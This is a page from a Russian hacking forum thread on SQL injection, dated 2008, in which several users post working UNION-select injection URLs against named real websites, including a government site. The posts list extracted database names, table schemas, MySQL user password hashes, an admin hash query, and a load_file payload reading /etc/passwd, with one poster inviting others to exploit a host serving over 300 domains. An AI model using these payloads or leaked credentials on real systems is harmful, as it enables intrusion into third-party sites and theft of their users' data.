ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 660 из 1242 « Первая < 160560610650 656 657 658 659 660 661 662 663 664 6707107601160 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6591  
Старый 13.09.2008, 20:40
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Цитата:
http://www.bcs-remembrance.org.uk/index/summary.php?sdeathid=131+union+select+1,config_nam e,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+phpbb_config+limit+57,1/*
версия 4
нашел вот пхпбб.залить не вышло,то там лажа, то там..и еще и бейз дир по моему..(
jbou:6cee2033f74468edae63e3142e3ed403:trouble
 
Ответить с цитированием

  #6592  
Старый 14.09.2008, 05:13
Аватар для ArxWolf
ArxWolf
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950

Репутация: 54
По умолчанию
www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,SQL,7,8,9,10,11,12,13,14--

version() => 5.0.27
database() => hiro
user() => ably@localhost

БД
Код:
Database: 
	a1
	ablycontract
	acucare
	advancedesign
	amigatech
	asiagroup
	asp
	autogates
	best-selection2
	bonric
	bossil
	brightpancar
	cattest
	chemibond
	cipta
	coffe
	coralvista
	craft_joomla123
	cross
	dalcy-33
	dc
	dearmaninew
	dqcreative
	dre
	edging
	edmund
	esping
	f5
	galle
	gold
	guppy
	gysteel
	hawk
	hee
	henglee
	hillgen
	hiro
	hunglee
	ibcom
	indulge
	intergrated
	isella
	ivycorp
	jark
	jbchair
	jian
	kaeykinheng
	kinheng
	kolling
	kpi
	laboff
	latitude
	lh_db
	liverte
	lls
	maju
	mascorn_mascorn
	mavis
	maxfiredb1
	meika
	misilkad
	mistercoffee
	murni
	mysql
	netfun
	newtica
	onestop
	pacific
	pacregcom
	panwrite
	perfect
	ppproduct
	procasa
	puipui
	qc
	rec
	reliable
	reliance
	reliancehydraulic
	reliancemetal
	rotomas
	roundcubemail
	sandarts
	sdp
	seasonair
	sengtat
	setapakaquarium
	sgcon
	shuz
	shzen
	sicomel
	sicomel_db
	simsiangchoon
	simta
	singkee
	sml
	sunshine
	superceramic
	tarching
	tienming
	titovkinheng
	topa
	triplast
	twinbow
	universal
	univonna
	vertical
	visionworth
	vitaltechnical
	wiltek
	wood
	yoke
	yongrong
	yuenchun
	yuenchuntest
	zenne
	zodiac
	zolanodata
Mysql юзеры
Код:
http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2,3,4,5,concat(User,0x3a,Password),7,8,9,10,11,12,13,14+from+mysql.user+limit+1,%201--
root:707290e61494c630
bsshu:7a3310dc39c1d3df
edmund:284f5fe14f30564d
si-comel:7a4e275338ddec88
и т.д
Хостится более 300 доменов :P юзайте...
 
Ответить с цитированием

  #6593  
Старый 14.09.2008, 05:41
Аватар для ArxWolf
ArxWolf
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950

Репутация: 54
По умолчанию
http://www.inventarium.com/en/item.php?id=57=null%20union%20all%20select%200,1,2 ,3,SQL,5,6,7,8,9,10,11,12,13,14,15--

version() => 5.0.27
database() => inventarium
user() => web@cl-t089-130cl.privatedns.com

БД:
Код:
	inventarium
	test

Таблицы inventarium:
Код:
	NEWS
	bank
	bank_option
	banqueInfo
	bo
	bp
	cart
	cartitem
	category
	color_definition
	color_definition_copy
	customer
	delais
	demande_banque
	didyouknow
	document
	document_dossier
	document_gestion_dossier
	dossier
	etape
	format
	google
	history
	information
	intervenant
	inventeur
	invention
	invoice
	invoice_line
	mc
	member_news
	members
	message
	message_intervenant
	message_step
	options
	pressreview
	product
	produits
	region
	requetes
	resultat
	revue_presse
	sondage
	sondage_reponse
	special_payment
	t
	type_etape
	type_taxe
	user_bank
	user_log
	user_step_details
	version
	ville
 
Ответить с цитированием

  #6594  
Старый 14.09.2008, 06:30
Аватар для ArxWolf
ArxWolf
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950

Репутация: 54
По умолчанию
http://www.vsa.hr/novosti.php?id=113=null%20union%20all%20select%200 ,1,2,SQL--

version() => 5.0.32-Debian_7etch6-log
database() => puckoot1
user() => puckoot1@localhost

БД:
Код:
	puckoot1
	test

Таблицы puckoot1:
Код:
	admin_smajlici
	comments
	comments_backup
	forums
	knjiga_gostiju
	main
	prijavnice
	prijavnice07
	sitestats_agent
	sitestats_country
	sitestats_daily
	sitestats_gets
	sitestats_imgs
	sitestats_ip
	sitestats_log
	sitestats_platform
	sitestats_query
	sitestats_ref_domain
	sitestats_ref_url
	sitestats_screen
	sitestats_url
	sitestats_vars
	users
	vijesti
 
Ответить с цитированием

  #6595  
Старый 14.09.2008, 12:36
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию
http://www.kiirus.ee/php/index.php?lang=rus&id=1 - жопа..я залил её в новость...
с помощью sql-injection
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,name_admin,3,4,5,6+from+admin
имя админа
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
md5-хеш пасса админа...
 
Ответить с цитированием

  #6596  
Старый 14.09.2008, 12:37
Аватар для Shadow_p1raT
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
Нацарапал за пол часа.
mysql>4.x

flashgamealot.com
Код:
http://www.flashgamealot.com/game.php?id=-18+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Version:5.0.45
User:merlin@localhost
Basename:flashgamealot

crana.org.au
Код:
http://www.crana.org.au/cr.php?ID=-9+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Version:5.0.46
User:cranadb@203.220.25.224
Basename:cranadb

mysql<5.x

sify.com
Код:
http://sify.com/news/fullstory.php?id=-14753978+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,1111111,12,13,14,15,16,17,18/*
Version:4.0.18-log
User:spfclogin@202.144.65.151
Basename:cms

flashgamestudio.com
Код:
http://flashgamestudio.com/flash_games/flash_games.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
Version:4.0.27-standard
Basename:dbo2

miraclemileshopslv.com
Код:
http://www.miraclemileshopslv.com/restaurants.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9/*
Version:4.1.25-Debian_mt1
User:db38027@10.1.3.25
Basename:db38027_miracle

shpet.shpet.ru
Код:
http://shpet.shpet.ru/site.php?id=-626+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Version:4.1.21-standard-log
User:clclon_user@localhost
Basename:clclon_shpet

novelgames.com
Код:
http://www.novelgames.com/flashgames/game.php?id=-22+union+select+concat_Ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--
Version:4.1.10-log
User:novelgames@localhost
Basename:novelgames
 
Ответить с цитированием

  #6597  
Старый 14.09.2008, 13:26
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
Цитата:
Сообщение от ArxWolf  
www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,SQL,7,8,9,10,11,12,13,14--

version() => 5.0.27
database() => hiro
user() => ably@localhost
В дополнение:
Там лоад файл робит)))

Код:
http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10,11,12,13,14--
 
Ответить с цитированием

  #6598  
Старый 14.09.2008, 23:48
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
GOV
Цитата:
http://menominee-nsn.gov/events/eventCalDetail.php?itmNum=3557[sql]
Username: itadmin_mitwus@localhost
Version: 5.0.51a-community
Dbname: itadmin_intranet

около 96 таблиц,но...
 
Ответить с цитированием

  #6599  
Старый 15.09.2008, 04:52
Аватар для ArxWolf
ArxWolf
Познающий
Регистрация: 29.02.2008
Сообщений: 35
Провел на форуме:
36950

Репутация: 54
По умолчанию
http://www.commercialistifrosinone.com/all_news.php?id=288=null%20union%20all%20select%20 0,1,2,SQL--

version() => 5.0.51a-community
database() => commerci_site
user() => commerci_site@localhost

БД:
Код:
 
	commerci_site

Таблицы commerci_site:
Код:
	livehelp_channels
	livehelp_config
	livehelp_departments
	livehelp_identity_daily
	livehelp_identity_monthly
	livehelp_keywords_daily
	livehelp_keywords_monthly
	livehelp_layerinvites
	livehelp_leavemessage
	livehelp_messages
	livehelp_modules
	livehelp_modules_dep
	livehelp_operator_channels
	livehelp_operator_departments
	livehelp_operator_history
	livehelp_paths_firsts
	livehelp_paths_monthly
	livehelp_qa
	livehelp_questions
	livehelp_quick
	livehelp_referers_daily
	livehelp_referers_monthly
	livehelp_sessions
	livehelp_smilies
	livehelp_transcripts
	livehelp_users
	livehelp_visit_track
	livehelp_visits_daily
	livehelp_visits_monthly
	news
	newsletter
www.curacaodolphintherapy.com/main.php?id=6=null union all select 0,1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23


version() => 5.0.37-log
database() => curacaodolphin
user() => curacaodolphindb@localhost

БД:
Код:
	curacaodolphin
Таблицы curacaodolphin:
Код:
	fotoalbum
	imagelibrary
	menuitems
	menusubitems
	modules
	oemp_administrator_activities
	oemp_administrator_dashboard
	oemp_administrator_emails
	oemp_administrator_limits
	oemp_administrator_pluginprivs
	oemp_administrator_privs
	oemp_administrator_shortcuts
	oemp_administrators
	oemp_archive_list
	oemp_archive_list_campaigns
	oemp_archive_rss
	oemp_archive_rss_campaigns
	oemp_asp
	oemp_autoresponders
	oemp_autoresponders_attachments
	oemp_bounce_codes
	oemp_bounce_log
	oemp_bounce_types
	oemp_branding
	oemp_campaigns
	oemp_campaigns_attachments
	oemp_campaigns_clients
	oemp_campaigns_cms
	oemp_campaigns_cms_refs
	oemp_campaigns_content
	oemp_campaigns_forward
	oemp_campaigns_forward_detailed
	oemp_campaigns_labels
	oemp_campaigns_linkclicks
	oemp_campaigns_linkclicks_detailed
	oemp_campaigns_maillists
	oemp_campaigns_outbo
	oemp_campaigns_rating
	oemp_campaigns_rating_detailed
	oemp_campaigns_read
	oemp_campaigns_read_detailed
	oemp_campaigns_rules
	oemp_campaigns_schedule
	oemp_campaigns_schedule_recursive
	oemp_campaigns_smtp
	oemp_campaigns_statistics
	oemp_campaigns_tracks
	oemp_campaigns_unsubscriptions
	oemp_clients
	oemp_config
	oemp_cron
	oemp_cron_optreminder
	oemp_customfields
	oemp_customreports
	oemp_emails
	oemp_followups
	oemp_followups_track
	oemp_integration_screens
	oemp_labels
	oemp_linkclicks
	oemp_linkclicks_detailed
	oemp_maillist_administrators
	oemp_maillist_aliases
	oemp_maillist_autoresponders
	oemp_maillist_banned
	oemp_maillist_blacklist
	oemp_maillist_clients
	oemp_maillist_customfields
	oemp_maillist_emails
	oemp_maillist_followups
	oemp_maillist_members
	oemp_maillist_messages
	oemp_maillist_pop3
	oemp_maillist_smtp
	oemp_maillists
	oemp_members
	oemp_members_activities
	oemp_members_activities_detailed
	oemp_news
	oemp_news_recipients
	oemp_newsletter_templates
	oemp_periodicprocesses
	oemp_plg0005_emails
	oemp_plg0005_maillists
	oemp_plg0005_reminders
	oemp_plg0005_sendlog
	oemp_plg0005_sendreport
	oemp_plg0008_translations
	oemp_plg0008_translations_board
	oemp_plugins
	oemp_plugins_contentprocesses
	oemp_plugins_processes
	oemp_plugins_tags
	oemp_pop3_servers
	oemp_process_log
	oemp_read
	oemp_read_detailed
	oemp_smtp_servers
	oemp_statistics_actions
	oemp_tabledependencies
	rightarea
	team
	users [username, password, admin, lastlogin] 
	vacancies
Последний раз редактировалось ArxWolf; 15.09.2008 в 05:22..
 
Ответить с цитированием

  #6600  
Старый 15.09.2008, 14:38
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию
Еще немного:
Цитата:
http://www.ingbretsen.com/print.php?id=-1+union+select+1,2,3,user(),5,6,version()/*
user() - ingbretsen@localhost
version () - 5.0.37-log
database() - ingbretsen
Цитата:
http://www.earthenergy.co.uk/news.php?id=-1+union+select+1,2,user(),version(),5,6,database()/*
user() - u10037433@lon1-webmysql-1.msh.demon.net
version () - 4.0.30-log
database() - u10037433
Цитата:
http://www.dahlenassociates.com/news.php?id=-1+union+select+1,2,user(),version()/*
user() - dahlenassociat@10.2.3.42
version () - 4.1.25-Debian_mt1
database() - dahlenassociates_com_-_dahlenas
Цитата:
http://strangefortune.com/news.php?id=-1+union+select+1,2,3,user(),version(),database()/*
user() - strangefortune@localhost
version () - 4.0.20-standard
database() - salo
Цитата:
http://www.eponaclothing.com/news.php?id=-1+union+select+1,user(),database(),version(),5,6,7/*
user() - dbo172586143@212.227.127.168
version () - 4.0.27-max-log
database() - db172586143
Цитата:
http://www.tri-shield.co.uk/news.php?id=-1+union+select+1,user(),version()/*
SHOP
user() - trishield@localhost
version () - 5.0.21-standard
database() - trishield_new
Цитата:
http://www.cellosoft.com/
как оказалось баян!
Цитата:
http://www.bangladesh-info.net/view.php?id=-1+union+select+1,user(),version(),database(),5,6,7 ,8/*
user() - shahid_shameem@4-Sterling.us.m6.net
version () - 4.0.15-nt
database() - student
(сам сайт защишен авторизацией на ява-скрипте! =) напомнило Античат-квест! (; )
Последний раз редактировалось Twoster; 15.09.2008 в 17:11..
 
Ответить с цитированием
Ответ
Страница 660 из 1242 « Первая < 160560610650 656 657 658 659 660 661 662 663 664 6707107601160 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ